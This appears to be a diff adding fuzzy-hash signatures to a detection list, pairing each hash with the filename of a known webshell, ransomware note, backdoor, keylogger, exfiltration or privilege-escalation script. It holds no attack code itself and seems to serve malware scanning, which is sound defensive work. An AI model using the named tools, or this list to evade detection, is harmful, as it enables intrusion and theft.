+192:NDWqrgc3z384Ip9dbk+YVbDvoKaRDza5VOM+tAS4DjD+PmBo0l1FLjdVD9KdxLq:BWqrNBydAbvoPu56zi+c1loG,"rader.asp"
+192:NDWqj3gc3z384Ip9dbk+YVbDvoKaFza5VOM+tAS4DjD+PmBo0l1FLjdVD9KdxLq:BWqrNBydAbvoPu56zi+c1loG,"Rader.asp"
+192:ndtSapF9lGZdtSabxXc0XjsdtSRTlTcgXb6XdtoQTTeK4TwqOSverWIlIXv:nzE6bXdqM/SnISf,"PH_Vayv.txt"
+192:ndtSapF9lGZdtSabxXc0XjsdtSRTlTcgXb6XdtoQTTeK4TwqOSvep:nzE6bXdqM/Si,"PH Vayv.txt"
+192:ndtSapF9lGZdtSabxXc0XjsdtSRTlTcgXb6XdtoQTTeK4TwqOSveB:nzE6bXdqM/SM,"PH_Vayv.php"
+192:nC4qZuXvG4DDfF9mchOKbc+4K4T/X64fPUp2q//Har:CkG4PfFNhOXoSUIqHar,"bt.php.22"
+192:NA2Y5ssYDkA24365vc8DeKOPZ6MkFwQAGfZlv4JvPeyT3fCQ:C5spDNq55Ox6hwGZt4JvPZ,"VolumeShadowCopyTools.ps1"
+192:n1J7Ai6ugrfmFNWW1Nchs8GW7wBMddANTn1m3V2ZHNZjLnqWD66vV7VWD667a:rqnTdAxZtZd26vV826m,"2017-03-10-Spora-ransomware-decryption-instructions-US123-ABCDE-ABCDE-ABCDE.html"
+192:n1J7Ai6ugrfmFNQJvW1Nchs8GW7wBMddANTn1mtsl+oZHTGZjLnqWD66vV7VWD6t:rqzJvTdA2+XZzGZd26vV826m,"2017-03-06-Spora-ransomware-decryption-instructions-US12A-ABCDE-ABCDE-ABCDE.html"
+192:n0qWtlMthl4sWVHHkrmmz/6diSgpCe1ZyjJwfX7uAVdKSHtFu4SzcbVr6NbqqCho:ZEECmT6eCe1iY6tqkBwdGGBd49/,"BratShell.php"
+192:mUOUWVh9QpixfcBP3kVQS6gJn2sw/rNh3nE07/:mUOUWPoBPkWv/rNh3nE0j,"cmd.sh"
+192:MtFJf3o9oxWNVJYLhYKi7+tLwDHm99mbq:UfY17+VwG9su,"m_varlaam2.jpg"
+192:MtFJf3o9o63NVJYLhYKi7+tLwDHm99mbq:UlY17+VwG9su,"mikolaj3.txt.1"
+192:Mpk1Ig1jbs8s6M/38VbnpSIayyx+HHiHBKz:Mpk1Ig1jbsyVb0ICHq,"NTFS_Common.h"
+192:MMWAj2F1EWyit0vcVagKhcKAuactdSlVdIZSzlGCMU:MMWAj+1EIEgKuK3fBSzlGE,"bt.php.83"
+192:MmgpdSdS894E1wfke+oefe9epWuaGlBRgtKkmMwr:kr1dyejefe9eFlBRgC,"bt.php.85"
+192:MKl8qxkTUSzfeZS1W3Ws0vUwOkzCCftAnKWgEK:X/kTUVLh0LHfanKSK,"bt.php.62"
+192:MjeMfkVZkT+yDWdSBI1S7oM4AwqjpildmYqc59Qtk6metfGZbg6s:MjEjE5sQElmYqaYk6metfn,"exposedbotnets.txt.1"
+192:mfMyULseW+dSNJVr5swYRZI3uacwULmRMI:SULseW0KmZIJrr,"bt.php.160"
+192:Mf/6oflmqhIymsOdE6bchdgnECUFTEU8b0eYhEqAtQTH4zmcpuDVLD:Mf/rf403eE6/wgyeYhAKbsm1hLD,"bt.php.66"
+192:Mdw9td57VcUCidxXj9rVMLiE9OVt+jZdy/PeqzoBknxq26EUbNp4F9jo4L:MULFzCsxSL79OVtKmP1HnxqQUbbO9jf,"a6dd300cc82ad44a8e80ff380f055608_php.txt"
+192:/McXHUaqQMNI/Q28Q8ZQgKQxvrVclsix6FlhlJk2IRGqYTT/69dWOhizS+qzB2nK:/h2QMNI/Q28Q8ZQgKQxvrDqYT23un10,"php-shell-gifx.php"
+192:mB43AFVnNvP4rPhuaJ20P6kNJ14ldS93TOl7yYcgb4QM8:74Nv0s0P7wu6,"bt.php.65"
+192:maVPlmgKChwTfweiLFfUw0Sx6H01NdGCk:miHhwAslSaCk,"confkiller.php.001"
+192:MaBOfaxaKeRTwX/m65UnRAWg1Ea59CRi+Vkuy/tVI1s5np:zslEiOn,"Php_Backdoor.txt"
+192:/mA+6pRB5cCVaP6MlhuGrOZBYvkINv8/h9jiZc5:O6ppcCVaSMlXrQBYMcv8/ri65,"2016-06-24-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+192:M3mPI/xzJlVp/5XnReXHjq9TPrOb3M31VUBL0gzVTmy3TXqPu:4cuzbVmOPQYUyyay3qu,"original.gateway.phps"
+192:LXdIYKrCPdStJFHrHpk9/mzclAT+c9AuaLBuv2wsGQo2fMU:LZFcSqsGI,"bt.php.13"
+192:lwlL42DxmVzlItbTv7aF/bVdyfayfxgRs:lwV42DxmV5I9Yc/us,"Find-AVSignature.ps1"
+192:lV1WSs6sH9UilR8woApSfNH8fUEjrOLV6:c,"ec.txt"
+192:LrQ3j9Pkguu3pz9iBYlvu8KEeCmh3WqyTdS8NcmWmeN2WpLtxllLpCs:Pyju2iBYlvu8KEeCKhWSVmeN2ExllLpL,"sep16-7.txt"
+192:LrMjchxTrQQ37HhU6/WQRZPyMiOa4NZfX1ORGk7ePHMFO:PMqvGKiOXZP1Tf3,"ob44.txt"
+192:Lr4G9SyCU3knoMADETod++1OQK0G+eyZQmlG8x55NChueFMuKXZsSUFUyoFkAThM:PVCUioMtm9ZZlnN2uAM8FUt/hM,"obf1.php"
+192:lPV8h84JP112PoLl9oetibzD2xH7AmfO3LP28r6+oXizkRtRxB:lPK64B11io8etibn2x7AmWBWLB,"indexer.asp.php.txt"
+192:LOfYO85gcH/4uhN8fNLAlu2NlrGxrk4NNNLe/Vlq:99dAuhCfZAlu2NlrGXzZe/Vlq,"2016-04-05-TeslaCrypt-decrypt-insructions.html"
+192:LNV5XvlkJk9kv9/VcuacnhrWblPk1dS1kQu4Mk:HDUrVaVqNM,"bt.php.45"
+192:lKxqdJa3ptljIu8ZF1E8SN4dB62LrRHS+:KqdYz4jtgeBTrA+,"Recovery+issvi.html"
+192:ljf4/72Lf9imsdNkSP0EutFz8nm3cNIo6MeKV/U7m8lYh5rIIX:m2Lf9imsdZstFzsm3cUIX,"reversed.accountTu39.phps"
+192:Lj4LNjaUG7RsfyYfruJZ7wAIxthOysZVEPbCLzi9G/k70zq/CZjgsGm:Cmsf/zuJZ7wNlSVvLzi9770zq/ujf,"bt.php.201"
+192:lhx3iZWmco0jJKfUuQG0hirr+dUjkg+VqkWvR/2OvCs9m+64YFYWv:lbVYOdUjkzVqkwBjmz4YFYWv,"b38b8c0149df2623526faf52a728a263_php.txt"
+192:lGZu//GB7XczA1ygu/3zw1kl/u//aNvib9fVR5+u//vXct9lac9ou//GQsR7HNh:ls9RNqpnibTR5+V2F7HNh,"klasvayv.asp.php.txt"
+192:LdSVBpb14V6I6o/vYGaZvFua0j7TYM7M4:hy4V8kvTAm9,"bt.php.124"
+192:ldjzy5GqhTkpmkUZU1zSpZEyTDlI+w9XBlSI2aw1Sq+1IdlrKap+xKaP8MB8M1+g:HGPGENpI2aw1Sq+2FNoD,"脱裤4ngle.aspx"
+192:LcZ6bbnCWuzxjflQNbN66puQM00m2CG6mzxxY:Lc0n+5rAux005CG6Sq,"bt.php.88"
+192:lCm6i2wPTLRTIOLj8GAkwugLzTLzYKlLzguanpFLzkUaYa5dSZcirXJVUGm:lJ6ij9TI4j8RzfzpzUzm7cTW,"bt.php.203"
+192:lAJaJIJh61BCOHZ3fmhVBtbC+rad3a7HJAggHsGm:OJ8IJc14OHZkVBtbZfpGO,"bt.php.233"
+192:LAiaMcXNUaqQMNI/Q28Q8ZQgKQSVclsix6FlhlJk2IRGqYTT/67lWwhizS+qKBrz:Lcb2QMNI/Q28Q8ZQgKQSDqYT258n1Z,"amarela.txt.1"
+192:LABMcXNUaqQMNI/Q28Q8ZQgKQSVclsix6FlhlJk2IRGqYTT/67lWwhizS+qKBrnz:LQb2QMNI/Q28Q8ZQgKQSDqYT258n1Z,"helpers.php.1"
+192:LABMcXNUaqQMNI/Q28Q8ZQgKQSVclsix6FlhlJk2IRGqYTT/67lWwhizS+qKBrnd:LQb2QMNI/Q28Q8ZQgKQSDqYT258n1k8,"helpers.php"
+192:L9fbkM7jTFvi2oTMFNE6jEC2o1Hw5aklnOX2dXq2:tkANLoYE6IU1HezOGU2,"bt.php.52"
+192:kx9k6vhbaWH1ZYTGiuvMzVahAKO5tGyWtcMsjD5rn9EU:kx9k6vhbaWH1CTGijzVaSWtqf,"cat.jsp"
+192:KWlv+Z61yU9q00jiXwskn8HJsJZQq/qht4cQkhiFR9jqXCjIex+fE7KZpPKtf:w61yU9q00jwwypsbR/it4AiL9uXjmFf,"Ajax-Command-Shell.php"
+192:KusmxxNIpKkbWf/qU4iyMOD7DTYGK2CutgCJGb:K1mjNIpKkbgb4RMsY3WtJGb,"Asp_Aspx_Php_By_HUC.jpg"
+192:+kR6zDsytlPxoRJwK0Xy7e1Uv+HFuaaKdSZWkB+XqMw:90Xy7e+v+HaAVO,"bt.php.172"
+192:Kps/PVBZdVX51ISehDyYEIBT3+so+QAxQaTTTF6QUYejG4kkJ8OVspnChn2XYEwv:R/PPZde3DxdusoG/BQlBhn29j0,"dz.sa"
+192:KNW+lv7w7Ngex8bi5EnCG5vw/K3QBZ250NtAe4RE:KN9v7w7FSe5vGtwS3EZ2qNtZ/,"bt.php.179"
+192:kLH+ZA/uWLzoPv65pHWaqqzsQ2X8niLFbFLAKLAYsGm:hZsuWLSk2aqes5X8Qq,"bt.php.212"
+192:KlABBRx9SeAYlckMo8A9BbQ2X9UaoiVcC:K6Xy3QToU,"Serv-U.Local-Privilege-Escalation-Tool-for-win32.php"
+192:kitjtcK7Tv4LcBTUVxAdFDX4LdQ0MomEtoNzznnbOtDaQY5+docP/PdfG3Me0Ir8:XExAdFDX4MPOovaocH1fGx0aB8xb,"0d909345bd9b7416c4e04d2d40325596_php.txt"
+192:KhHTKws6dzk64kmxdsuaLnsxkdSxaUfGp75vRUMY:KfIOnsUFUuTI,"bt.php.150"
+192:KHdAFKiYghbqVpjOnKLnzIMjj5K8m7LkCN3UvcKx9:KHdAFKPggbIuWJ32,"Antichat Socks5 Server.php.php.txt"
+192:KbrWAz3AGoDGCERzVZpq3A9sLdf7Wc4ygAx2Q:KNzw/D6xo6sLlc2,"bt.php.34"
+192:kAnzQsWLFCAAnzQsWLFCWLuvjap5X8RrK5s:ba2Ky,"jc.flv"
+192:k1YdSBInojoqR6cIypBRoDGoua97pCHeF0KTzz6MYR:k81nojoqR68AIs9k,"bt.php.41"
+192:/+JurCg+hIN0VxczKej1WP40bn5jxjVExpw:/+DhINce4QY5FjVl,"bt.php.80"
+192:Jsu12kQcOr35mF+pPDK8CWUv5jiYHX1OhmfF8:R4cObUF+pPDKlWUxjhl6,"Add-Exfiltration.ps1"
+192:jp5VTMRZf+QnmVLtSBlRoNR3voEkTRXHNw3A:jJTMRZfNILtSBwNhvDkTRXN,"bt.php.169"
+192:JNpBeWN6hb6rrki7Kzz62ZLw9LB8mIr1qun8t:JNDeWsl6ci7HOwZXIIiK,"bt.php.24"
+192:+jnl/UeH47fpU71osp4zFNZL3+DQOubG6sGm:+ZZH4zpUSspUFNZLKQOubO,"bt.php.235"
+192:jmACaBRpZUSRaLWYt1uyTaVJkrkg9DKgFt2mRgN:GaBBUSRaaYtHTYJkIEDKgam+N,"2016-06-17-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+192:jHRAcijdSB555dfOfEbN7TZTkNTXkOIA5W/IuaEyAplMo:7RoZ25zqK99okA5W/mApX,"bt.php.152"
+192:jG9td57VcUCidxXj9rVMLiE9OVt+jZdy/PeqzoBknxq26EUbNp4F91iO:oLFzCsxSL79OVtKmP1HnxqQUbbO91d,"zorg8.php"
+192:jDFzdS5DDRhLb5FbhP8DiHkuaTHylBsdm6+i3+Mc:3HkbXFP4yDsm/wg,"bt.php.168"
+192:jCcb8cvIYYyJvkkXepkXe2Zys6Dici6Ki6kg6U96556hFN6dNeSoBoN0u:XIYYcvhdes6di6Ki6P6U96556hFN6d4s,"Backdoor.ASP.WebShell.a-WebShell-for-WAP-v0.1beta.asp"
+192:jAMMcXNUaqQMNI/Q28Q8ZQgKQSVclsix6FlhlJk2IRGqYTT/67lWwhizS+qKBrnz:jlb2QMNI/Q28Q8ZQgKQSDqYT258n1Z,"4.txt"
+192:+j7rdS9Oya8TFd/hunN/wj6u+uYGua58uU5uVEM8:+j7BXkdJamjpFRA,"bt.php.107"
+192:Is9PQbNPa2uNUhrmhJALVWlF2jIET/W3K:B9Pd2uumrKU+TO3K,"158.jpg.2.018"
+192:Is9PQbNPa2uNUhr8hJALVWlF2jIYT/W3K:B9Pd2uu8rKU+XO3K,"158.jpg.3"
+192:Is9PQbNPa2uNUhr8hJALVWlF2jIkIT/W3K:B9Pd2uu8rKU+pUO3K,"158.jpg.2.008"
+192:Is9PQbNPa2uNUhr8hJALVWlF2jIBT/W3K:B9Pd2uu8rKU+KO3K,"158.jpg.2.007"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jIxTT/W3K:B9Pd2uu5rKU+mO3K,"158.jpg.2.016"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jIPT/W3K:B9Pd2uu5rKU+oO3K,"158.jpg.2.014"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jIKT/W3K:B9Pd2uu5rKU+ZO3K,"158.jpg.2.015"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jIHT/W3K:B9Pd2uu5rKU+wO3K,"158.jpg.2.011"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jIcT/W3K:B9Pd2uu5rKU+jO3K,"158.jpg.2.012"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jI8T/W3K:B9Pd2uu5rKU+DO3K,"158.jpg.2.009"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jI5T/W3K:B9Pd2uu5rKU+aO3K,"158.jpg.2.010"
+192:Is9PQbNPa2uNUhr5hJALVWlF2jI3gT/W3K:B9Pd2uu5rKU+HO3K,"158.jpg.2.017"
+192:Is9PQbNPa2uNUh5hJALVWlF2jIz2sT/W3K:B9Pd2u8rKU+QO3K,"158.jpg.2.002"
+192:Is9PQbNPa2uNUh5hJALVWlF2jIx4T/W3K:B9Pd2u8rKU+SEO3K,"158.jpg.2.003"
+192:Is9PQbNPa2uNUh5hJALVWlF2jIsUT/W3K:B9Pd2u8rKU+r4O3K,"158.jpg.2.006"
+192:Is9PQbNPa2uNUh5hJALVWlF2jIONRT/W3K:B9Pd2u8rKU+JFO3K,"158.jpg.2"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIYujT/W3K:B9Pd2Q8YrKU+zunO3K,"158.jpg.2.023"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIvT/W3K:B9Pd2Q8YrKU+wO3K,"158.jpg.2.022"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIsT/W3K:B9Pd2Q8YrKU+TO3K,"158.jpg.2.025"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIPLT/W3K:B9Pd2Q8YrKU+8O3K,"158.jpg.2.026"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIoT/W3K:B9Pd2Q8YrKU+fO3K,"158.jpg.2.019"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIGT/W3K:B9Pd2Q8YrKU+VO3K,"158.jpg.2.024"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIDT/W3K:B9Pd2Q8YrKU+UO3K,"158.jpg.2.028"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jIbJT/W3K:B9Pd2Q8YrKU+uNO3K,"158.jpg.2.020"
+192:Is9PQbNPa2QNUhjYhJALVWlF2jI9lT/W3K:B9Pd2Q8YrKU+kO3K,"158.jpg.2.021"
+192:IRLOmHsC1NZBa+YnRUcjM8I5AGA3FTcftWY3Rg5JMcop+cWzO+QEn/7/:IRLOmn1NZBAnjM8dpTcfx3Wop+cW7QEz,"2016-04-11-TeslaCrypt-decrypt-instructions.htm"
+192:iQwSsAd6SiER7Eue4AVXmPJIoDlwb3FZ47BE4Qeg4aiGrqQDPHJV6o2:ySsAd6SiE1huBq8zp2,"DzW3b.txt.001.001.001"
+192:IiYCFoAYjbsOGmgxLdXW8/B5hfiET+bJu5ERP9/WBbBL:I5MoA/7bv1i+/EJWBR,"mod_joomla_shell.PNG"
+192:iiLjcaiEmH24IqWO8PfuWLWSlb37T9Lvp7LwU2UL:i6Miv7V,"phpconf.py"
+192:iiF1XiXHqF4EMabPlOW+BrVr5Pcd5LqtKbveJs1uIx9S/z:iI2p27mbz,"disablefunctionbypass.py"
+192:IhUPTNPa2EfcwjbhlhJALVWlF2jIylT/W3K:EUPY2E7vrKU+9O3K,"rss.gif.2.003"
+192:IhUPTNPa2EfcwjbhlhJALVWlF2jICXTT/W3K:EUPY2E7vrKU+jXXO3K,"rss.gif.2"
+192:IhUPTNPa2EfcwjbhlhJALVWlF2jI6T/W3K:EUPY2E7vrKU+RO3K,"rss.gif.2.001"
+192:IhUPTNPa2EfcwjbhlhJALVWlF2jI0T/W3K:EUPY2E7vrKU+LO3K,"rss.gif.2.002"
+192:ihMGR/pWI4WK8KxsD7nKCAl43YcKBMGdzdKwCDs7qtgZUZlsG4WIlIXv:iSc/pWI88JD7AzcmjpicGDISf,"Rootshell_by_SR-Crew.v2.0.php.txt"
+192:iGVRVdzc/Jvvfux2NwW303lp3l83lK3lFy3lDHypfp4LOiSjkK72w:iGHQJvvMXCw+jswe5,"Get-Keystrokes.ps1"
+192:IfQpvQXBLHhKTLFnd6PUugweGK8lpFTs84JszAPejxlLwqHmy3aUNpiPZB41PX:I48hwGPXgOXlXTBTAGdlLuzPZBGPX,"Invoke-PowerShellWmi.ps1"
+192:iF/hcRUrjJdSz7tm0vfs610FwneeQ12s7suxMy6GugifVxhdVXqRx:iF/hhqm+h0,"cca.php.001"
+192:/idzV4dSlYkG6RDjD/WYMgMd2gaZiuquaPNyyfioMnpy3M/cvYyxKgyqwrCw7czT:ay5kpjLWY98D3tp+qD,"bt.php.221"
+192:IdSFfSaxdfI2jEB/O7+JaMB5DrQJ6aDr8s1KxEtusnKxksPKx9sUKxdYuahVjIEk:KCz4B/K0HuIl,"bt.php.154"
+192:iBu1TzKZI2kE2cvBOCTSXuaEwbpNvrdSZVHM4:X1/KZI2OCTSXbbBi,"bt.php.130"
+192:IbPrj1enjkpY/bO/bipI0d/bxg0C/bGuajGms8iYdS11sMqn:IoApY/6/WpI0d/y0C/fmsMXn,"bt.php.121"
+192:i7YiUkQym89Z6WGtWKivG2aZ+JvDiCWUv5DiCVXVn+B49lSNoiERU4YEtbKRiaoX:oY7389TGRZ+JvDDWUxDrjn9DYEtvt,"HTTP-Backdoor.ps1"
+192:+Hzyaxk5Dp18aCzSkgsKWkEYdVw+dNedAP0dsIDurki3GWcET:sx+p18aYSklkEGO+QdXDib2WF,"94eae5ade8df85e773a77c70ca493bfe_php.txt"
+192:+Hzyaxk5Dp18aCzSkgsKWkEYdVw+dNedAP0dsIDurki3GWcEP:sx+p18aYSklkEGO+QdXDib2WR,"11d06f8a3b248e7d54d9846fd6b218f4_php.txt.001"
+192:/Hzyaxk5Dp18aCzSkgsKWkEYdVw+dNedAP0dsIDurki3GWcEn:bx+p18aYSklkEGO+QdXDib2W5,"11d06f8a3b248e7d54d9846fd6b218f4_php.txt.orig.001"
+192:/Hzyaxk5Dp18aCzSkgsKWkEYdVw+dNedAP0dsIDurki3GWcEj3:bx+p18aYSklkEGO+QdXDib2WV,"94eae5ade8df85e773a77c70ca493bfe_php.txt.orig"
+192:HwH2+lwgPVpzeXsgKm2Qigl2t3SkJJO4uOCIE:AOG/g1wgQikLuOQ,"bt.php.42"
+192:hVU6UEZqFy8+cAnHBWXzTNQbTWl7nnCuWYZV91Ya:hK/SYeTHoKP6yYB1Ya,"bt.php.14"
+192:hva6vHYb0xWRLIKFcFTvGDKxKwvfS8NV/CMJbLu57Yef5/5:x/HFx+LIEWv2jwvfS+t9LmYeBh,"bt.php.10"
+192:hV1WSs6sH9UilR8woApSfNH8fUEjrOLV6:4,"spread.php"
+192:HUu1+qBix8INiT6J7dQQQQTn/gr2G8CE4K:HH1Gx8IN+8QQQQTn/gqG8C7K,"galerz.php"
+192:hU0DEMky7ggk44NQmjum4Al4ikzyxjOEDj8Q/rz2kZVFkSn:hU0i5NvjuNBWiEDYQ/35VFr,"sadkjfhalskjdhf.php"
+192:hTpRoOGF8x8OhkNXUSrz4QDJZb/MIR9yN6MOU6VEYqJ4L13:hTDBx8FNXUUz4c3bUKyNPUd3,"aspx.jpg"
+192:hTBdSVJ6Kw+9fsQPSWua5dQKKDZGwPPuKTxIxYt4MME:5iQKKYwPBIiL,"bt.php.134"
+192:HsKx2uy3PBLKWoZeZsNXz9c0xult5/6ak:HUPBLQesNXz9Bxuz5K,"bt.php.161"
+192:HScRudShiY5r7T1dwphfmeMhqeYhFkIuwkuaoLYFSZoOXtkZ9qf0M91Mw:bilOR2xmJQeYPjLSOeZ0z,"bt.php.61"
+192:hOL0qM68wUdSwV0ugknKLK3SmPS+pd+Q+2OVuaSrorBQGm:hOLjM68P4ugrcShkQQv2q,"bt.php.224"
+192:hmAEONpNZ4KPWdka97usXwX1a9UQN1aV7RPANGj:WONF4KPWea9vXQ1aeM1aVlAcj,"2016-06-20-decrypt-instructions-for-all-CryptXXX-samples.html"
+192:HLsvmzy8aCGMd0rbbtQJfgAEbYNkmawYcji1HxVSfsko5YjcMFyHJabKPssE/RoA:rsvMVSd2gOFaGf0YjfypKJ3l7,"perlbot.pl"
+192:/HKmkYS9ZdFWb1Z3DY+YD3Y0SUYRFYa3e+slJGKT+jnWIlIXn:xrYa3e+sCF6IS3,"Moroccan_Spamers_Ma-EditioN_By_GhOsT.txt"
+192:/HKmkYS9ZdFWb1Z3DY+YD3Y0SUYRFYa3e+slJGKT+jN:xrYa3e+sCF5,"Moroccan Spamers Ma-EditioN By GhOsT.txt"
+192:HjW9+0Eybh5Y9QQQAz5Br/ArWm8Vk3pKr:Hi9OQQQAzbr/AKm8Vypa,"labib.php"
+192:HjdwNqd+X0VZqY6TnEsaWev0hlt1cueokhu6xhu9fhuoBeFUyBv/yVmRaXOw1vn:KqMCAY6TE1We8L1cXh5hEhreFUwa+wZ,"Asp_Aspx_Php一句话合集.txt"
+192:HI+vDmUWIFyd6KngaS04SFPah8YIvweuHf:Hr7mUWIO65aSs2IO/,"r00t.php"
+192:HFBQXxad0emuYM5bak3qkUOWGjxdSbPaqSBAVplTGqWH5JVqPL8FTqrDN9j6dPvX:HLlbT4+mYzR5CYinX253U1E61HAqR6X,"Rootshell_by_iron.php.txt"
+192:HdrBfilhbQZk5O1He26XsxBhg3YpYDyWHWq2RzLji0eFW7J+z+:HGlBRoRuw3j3eFoJ,"b6e4241ba1e13f97cf6c5bd36e89f2d1_php.txt"
+192:HdL7poIWeOxqhuyDGmhoeE51DRkzvKhCs0d9jvHI:Ht9dZhushoeeUrQh0d9jvo,"bt.php.114"
+192:H8OdY0Ah9x4wWph3rf/uY7lkOViFCBfkVZkT+yDWdSBI1S7oM4AwqjpildmYqc5u:4cBrTZBVKHjE5sQElmYqaYk6metfn,"bonzen.jpg.1"
+192:h0iUw3K6qV4YNbv21ZbZzpujI4K+zRKo9PsXebHvB:h0iv3KBOHH4P1HvB,"STNC.php.php.txt"
+192:GZrvx3iuFynpF/NTKLAVsU4LgIum5vOLfZDDhhamx7v:GZvxuL/NuLAKldN5vOLBDDhha8v,"bt.php.127"
+192:gVcfXcA3B7XczA1ygfGDt0w1kl/fXWFaNvibIfVR5+f5WFWXct9lah9of1WFJQHh:gqfdRfQqpfvibqR5+f09fF7HNl,"kacak.php"
+192:gVcf3cA3B7XczA1ygfGDt0w1kl/fXWFaNvibIfVR5+f5WFWXct9lah9of1WFJQHO:gqf9RfQqpfvibqR5+f09fsj7HrP,"kacak.txt.001"
+192:GtvXqPXjymk7X4Lb+ftVmsJF8oQLnccuF9n:GRXubyoLCusVQTq9n,"bt.php.197"
+192:gSXQDc6Qvh1Mbraapa/JhygeqvXsLk9g+suYNcAmLyAk9g+suYNcAmLx:gSXQDJQvM/a1ygFvsw9g+svcAmLw9g+n,"mal-script.js"
+192:gphbicZhoKOnJgHIALoxkn3P4nD3WdS8k9rt1rby6:gph+0OJgHIAUxkQD3WdS8kX1PT,"NTFS_DataType.h"
+192:GoyRvVNF/Rk6+zIS8EaQgmEAnjYQYnjOGIj2aM:56/SdPwojYQgjOn2F,"cpanel.php"
+192:gnsu1Nmjyaxg3D8wt8Bual7uCepXakQjdSdebsJo3Mc:gso1cwmB7uNpXaxgY,"bt.php.156"
+192:gMCKV4fe1hk1h21hm1hsYuasK5/ugvvsjdSFBUMg:gg1a1o1o11/jC9,"bt.php.19"
+192:GjkiY6bsa1hXs3uOnaBBDXknThkOSPq506q:mY6IGhXquOnaBEh83,"a.out"
+192:GhtkfO3NvwlVSJxsmqz3JNtUVrpxIdNfEKd:G/kfaNvwl4HuTJNtQTHKd,"bt.php.44"
+192:GhtIlJTAOplMmP6VoCcESCkLMc3Futzir7I2sDM2N1MyU5DhX27qSC6ihpL:GhpYskLd1utuWlQN,"Invoke-ReverseDnsLookup.ps1"
+192:gHPbG8/dSFovwbAiphVQbDhwLHNMieyZKxyBwRzMua1MAd:gHPbvRvwbAipjQbD+xpKABQK,"bt.php.192"
+192:GfDAKEmhNC0t/VCLhfTtJJ2PG/ybtO5L/op09QIpOTJQ7Emm:GbAKEmhNC0t/ULJPJ2O8cV3Otx,"2016-03-02-kiwitemplates.com-engine.mootools.js.txt"
+192:GfAQ2UCFX7SkFx31ERTt2jSacj8iIPt1hmC:ZQ2TX7SkFx1ERTgcj8iohz,"mempodipper"
+192:gEfbuTdqUATiMGwQ6bA0jZ1xB6ZHT4xRbTEQ0JC4:gEaMUcbfxB6ZHkxtgf,"bt.php.118"
+192:Ge1v4Zew2epknmM0vSrP/MHSBiIFst7BAUeACCMPcx4Jz6:Ge1v4ZeQqLV2JWUeACCMPw4I,"hackersh"
+192:gC56zVSZkVFK/6HSOSCbiOts9pcEDvEWgMTQMXMqUJ51TH8qCuk:IzUZkSXO7fs1Dv78X5/hHIuk,"Silic Group_cgi.pl"
+192:GaZQiuXWaJ4US3qox+5ArsCrSo6qQuP7+Ii80mfk/5TNQITiBSMVlr3xd93FCv1S:GTb4US3qTGZ0mfSZoxzFC0,"cmd.txt.1.002"
+192:gaJoIWnCy6hmeNDSyy4vgoTR7BwDyIn4s5UhQ9o9D/57z:xoIWnC9byGgo9Zh,"thumb.php.1"
+192:gaJoIWnCy6hmeNDSyy4vgoTR7BwDyIn4s5UhQ9o9D/571:xoIWnC9byGgo9ZH,"thumb.php"
+192:g9xQ5bqePv6VIS4wjr/IwYeTRQIpDR19fr:g9qUVIJwvAZI11Jr,"bt.php.94"
+192:g9VelOjpZPFcViBUESCyfSC6NN+d6D7plteKSCTfzRoFCy44iSCyvN6D/RTyiYIq:CVJ8ezoY1oCIlt,"Invoke-BruteForce.ps1"
+192:g4WNVaD6BA2aD/NSWdlaDMnHSEaDV2/2/7azJzQzAzT4bfaDWbWIaDRz0I/jaD+2:g26HE1cuJupuyiFuM9z6OI,"sad.txt.004"
+192:g38hHE3fI8mcMm/WNsy17x+6vC6uTOC6NN:g38hHE3fFmlmuDhx++C6ej6D,"mmnzj3rr.oyz.vbs"
+192:g1Nlw1dSZZPdz/LVwgkdHzH2Gkua3lXHG4a3HXL7MY:UOnLzc6XR,"bt.php.182"
+192:g0Dvd7JGKeB1RyEl2QZ6vqc2SqGNWcEnIKyO0ko:Fm56E0QBcWGNWcEIKD0n,"antichat.txt"
+192:g0Dvd7JGKeB1gyElPQZ6vqc2SqGNWcEnIKyO0kl:Fm5dEtQBcWGNWcEIKD0y,"Antichat_Shell_v1.txt.001"
+192:fVJC6nS5EjmWaHwZdDSu5qhWB0qG1UWIkLls54AX6zOW5jjqEWML17E827nNiCqZ:fhvmZXX97E824,"Customize.cs"
+192:FTXWqj3gc3z384Ip9dbk+YVbDvoKaFza5VOM+tAS4DjD+PmBo0l1FLjdVD9KF7xr:xWqrNBydAbvoPu56zi+c1lov,"reader.asp.php.txt"
+192:FQMqDJ8AQN+n9N0sNTt3c90hvhA3fEiKn5YZ:FQtDzbvNTtk0hJsfrkQ,"bt.php.173"
+192:fpTh9NWA1hQfs3A/sSsRsNWx0d0q1yo3wy8nlzpydJWOngs3cMrQY3kjOjbNy3zB:NeP0zePCYLjbc29ioUlOuL,"cmd"
+192:fnTfOyZtZ918GGPUsYXyYcUsY6ya3csY6yaK+sY6yao3Ks8uEWpfWWMkFSzR95Yr:fTq0Yz+z25sDw10hvWg973EvbISf,"PHANTASMA.txt.001"
+192:fnTfOyZtZ918GGPUsYXyYcUsY6ya3csY6yaK+sY6yao3Ks8uEWpfWWMkFSzR95YM:fTq0Yz+z25sDw10hvWg973EvO,"PHANTASMA.php.txt"
+192:fmN1n7ETdSJSzM5VBVyznDyQkEua6a5itExwQ4mbjMI:eedzvzWFxa5itExwQ1x,"bt.php.109"
+192:FHRPh68iQ4GwQQIvzP9ET6p7f6Qqy8N4yQfQ8cEpQxriQ8M0ctOyWhVE7jmULh6p:Ph6yxhN6HWyV5wibhrwo6CtNzFl9c,"php_custom_spy_for_mysql.php"
+192:FhpO43cVgldgQhF5BYmpRTiecPVgaaOXsrS:p3jdgQplRJcPVgaaVS,"bt.php.2"
+192:FgTdaUBbJns+tR2WJvPobe6b3A6pI14E74jv:qTdaUJtAWJvPAeZ1LC,"Invoke-WScriptBypassUAC.ps1"
